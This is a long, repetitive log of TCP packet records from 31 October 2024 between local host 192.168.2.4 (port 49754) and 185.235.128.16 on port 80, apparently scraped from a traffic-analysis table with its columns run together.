                                                                                                                                            Oct 31, 2024 17:12:23.684160948 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684181929 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684905052 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684921026 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684935093 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684950113 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684951067 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684967995 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684967995 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684986115 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684988976 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685000896 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685019016 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685024977 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685034037 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685041904 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685049057 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685062885 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685067892 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685077906 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685091972 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685095072 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685110092 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685118914 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685143948 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685148001 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685159922 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685175896 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685189009 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685194016 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685205936 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685206890 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685221910 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685235023 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685237885 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.685256958 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.685276031 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.000896931 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.000986099 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001002073 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001018047 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001075029 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001075029 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001126051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001142025 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001195908 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001197100 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001214027 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001229048 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001235008 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001252890 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001266956 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001590967 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001607895 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001624107 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001641035 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001641989 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001657963 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001667023 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001672029 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001687050 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001703024 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001712084 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001718998 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001730919 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001734972 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001750946 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.001758099 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.001784086 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002362967 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002383947 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002398014 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002414942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002420902 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002430916 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002445936 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002454996 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002461910 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002477884 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002485037 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002494097 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002504110 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002510071 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002525091 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002533913 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002542019 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002556086 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.002559900 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002582073 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.002605915 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003305912 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003329992 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003344059 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003359079 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003371954 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003374100 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003391027 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003397942 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003397942 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003406048 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003418922 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003422022 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003437042 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003443003 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003452063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003465891 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003468037 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003483057 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.003494024 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003518105 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.003542900 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004203081 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004220963 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004235029 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004250050 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004264116 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004266024 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004273891 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004285097 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004300117 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004309893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004314899 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004328966 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004331112 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004345894 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004354000 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004360914 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004375935 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.004379034 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004394054 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.004419088 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005104065 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005119085 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005141020 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005155087 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005162954 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005167961 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005178928 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005182981 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005198956 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005214930 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005218029 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005230904 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005235910 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005244017 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005259037 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005260944 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005274057 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005275011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005290985 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005294085 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005306959 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.005316973 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.005338907 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.006011963 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006027937 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006041050 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006055117 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006067991 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006078959 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.006083012 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006098986 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006098986 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.006114006 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006124973 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.006129980 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006145000 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006146908 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.006160021 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.006165981 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.006189108 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.006211996 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007276058 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007291079 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007302999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007328987 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007344007 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007347107 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007355928 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007355928 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007356882 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007371902 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007381916 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007388115 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007400036 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007405043 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007420063 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007420063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007427931 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007440090 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007450104 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007456064 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007466078 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007472038 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007483959 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007488966 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007503986 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007514000 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007533073 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007745028 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007761002 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007775068 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007787943 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007791042 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007806063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007811069 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007821083 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.007833004 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.007859945 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008228064 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008244038 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008258104 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008271933 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008277893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008287907 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008301020 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008304119 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008322001 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008328915 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008337975 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008347034 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008353949 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008369923 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008371115 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008384943 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008397102 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008399963 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008414984 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008423090 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008431911 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008445978 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.008449078 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008461952 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.008488894 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009205103 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009221077 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009234905 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009251118 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009253979 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009265900 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009268999 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009282112 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009293079 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009296894 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009313107 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009325027 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009327888 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009344101 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009350061 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009360075 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009368896 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009375095 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009390116 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009396076 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009404898 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009416103 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009421110 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009438038 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.009448051 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009470940 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.009495020 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010139942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010154963 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010169029 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010184050 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010185003 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010201931 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010202885 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010216951 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010226965 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010231972 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010246992 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010252953 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010262966 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010277033 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010278940 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010293961 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010303020 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010308981 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010324001 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010334015 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010339975 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010351896 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010355949 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010377884 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010401011 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.010982990 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.010998964 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011013985 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011028051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011040926 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.011043072 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011058092 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011059046 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.011074066 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011085033 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.011101961 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.011126041 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.011291027 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011333942 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.011379957 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011394978 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011401892 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011416912 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011440039 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.011442900 CET4975480192.168.2.4185.235.128.16
